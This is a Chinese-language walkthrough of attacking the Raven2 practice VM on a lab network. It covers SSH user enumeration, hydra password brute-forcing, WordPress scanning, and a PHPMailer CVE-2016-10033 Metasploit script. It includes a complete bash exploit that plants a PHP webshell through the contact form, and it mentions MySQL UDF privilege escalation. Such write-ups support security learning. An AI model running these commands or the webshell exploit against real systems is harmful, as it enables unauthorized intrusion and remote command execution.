raven2(CVE-2016-10033)

1
2
3
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)

try1-ssh用户枚举

1
2
3
python ssh.py --userList /usr/share/wordlists/linux-user.txt --outputFile out.txt 192.168.2.133
cat out.txt | grep -v 'not' > name.txt
awk '{print $1}' name.txt > user.txt

获得的用户:

1
2
3
michael
steven
......

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt -I 192.168.2.133 ssh

我猜弱口令应该已经修补了。但是还是得试一试,==,万一又有,我又没发现这么低级的漏洞,岂不是很没有面子。

try2-web enum

方法: wpscan --url "http://192.168.2.133/wordpress/" --wp-content-dir "/wordpress" --enumerate u --enumerate p

信息:

1
2
3
4
5
6
7
8
WordPress 4.8.7
Apache/2.4.10 (Debian)

后台:http://raven.local/wordpress/wp-login.php

192.168.2.133/vendor/changelog.md
PHPMailer 6.0
Version 5.2.17 (December 9th 2016)
1
2
3
searchsploit PHPMailer

PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution                                                    | exploits/php/webapps/42221.py

searchsploit -m exploits/php/webapps/42221.py

1
2
3
4
5
6
  Exploit: PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/42221/
     Path: /usr/share/exploitdb/exploits/php/webapps/42221.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/42221.py

see /root/42221.py mv /root/42221.py rce_phpmailer_exim4.py python rce_phpmailer_exim4.py -url http://192.168.2.133/ -cf contact.php -ip 192.168.2.133 1


时隔2个月,继续这个靶机的练习 192.168.241.128

command:

1
2
3
echo 192.168.241.128 raven.local >> /etc/hosts
wpscan --url "http://192.168.241.128/wordpress/" --wp-content-dir "/wordpress" --enumerate

存在的目录:

http://raven.local/vendor/changelog.md http://raven.local/manual/en/index.html apache的目录


wordpress 4.8.7漏洞资料 https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/version_id-224338/Wordpress-Wordpress-4.8.html

CVE-2018-20148:PHP Object Injection via Meta Data


info:

http://192.168.241.128/wordpress/?attachment_id=11 wpscan扫描了这个目录,获得flag3

http://raven.local/vendor/PATH 发现目录遍历,获得flag1

思路

无弱密码;有0day漏洞,但没有exp;无脆弱的wordpress插件

查看wp后,就是自己没有发现目录遍历漏洞=。=

http://raven.local/vendor/security.md 暗示了phpmailer插件版本漏洞

1
2
3
4
5
6
7
8
9
10
touch test.rc

use exploit/multi/http/phpmailer_arg_injection
set RHOST 192.168.241.128
set TARGETURI /contact.php
set WEB_ROOT /var/www/html/
run

msfconsole -r test.rc
反弹shell失败。。。

exp.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/bin/bash

TARGET=http://raven.local/contact.php

DOCROOT=/var/www/html
FILENAME=backdoor.php
LOCATION=$DOCROOT/$FILENAME

STATUS=$(curl -s \
              --data-urlencode "name=Hackerman" \
              --data-urlencode "email=\"hackerman\\" -oQ/tmp -X$LOCATION blah\"@badguy.com" \
              --data-urlencode "message=<?php echo shell_exec(\$_GET['cmd']); ?>" \
              --data-urlencode "action=submit" \
              $TARGET | sed -r '146!d')

if grep 'instantiate' &>/dev/null <<<"$STATUS"; then
  echo "[+] Check ${LOCATION}?cmd=[shell command, e.g. id]"
else
  echo "[!] Exploit failed"
fi

运行以上exp,成功获得一个webshell,权限为www-data

2

接下来用php反弹shell,如同这篇文章

python -c ‘import pty; pty.spawn(“/bin/bash”)’

3

之后,web目录泄露mysql密码,得到mysql普通权限。 然后上传udf源代码,执行安装,就可以使用do_system()函数,以root权限执行命令。 https://whale3070.github.io/training/2018/12/11/x/

总结

之前用searchsploit 找到了关于phpmailer的exp,php、bash、python的exp,都执行失败了。

看到过一个问题,web渗透该如何继续提升?除非遇到一样的web站点,该搞不下来的网站,还是搞不下来。

我认为应该用代码能力,写工具,尽可能扩大目标攻击面(只有知道,才能看到弱点),然后精力放在漏洞挖掘上。

而不是脚本小子运用已知exp对漏洞进行利用。

就好像我知道锁A、B、C,我有钥匙a,刚好Aa能配上,我就能进入系统。

经过验证,搞不下来的站点,除非有0day漏洞,那就证明了该站点很安全。

继续提升代码能力以及漏洞挖掘能力吧…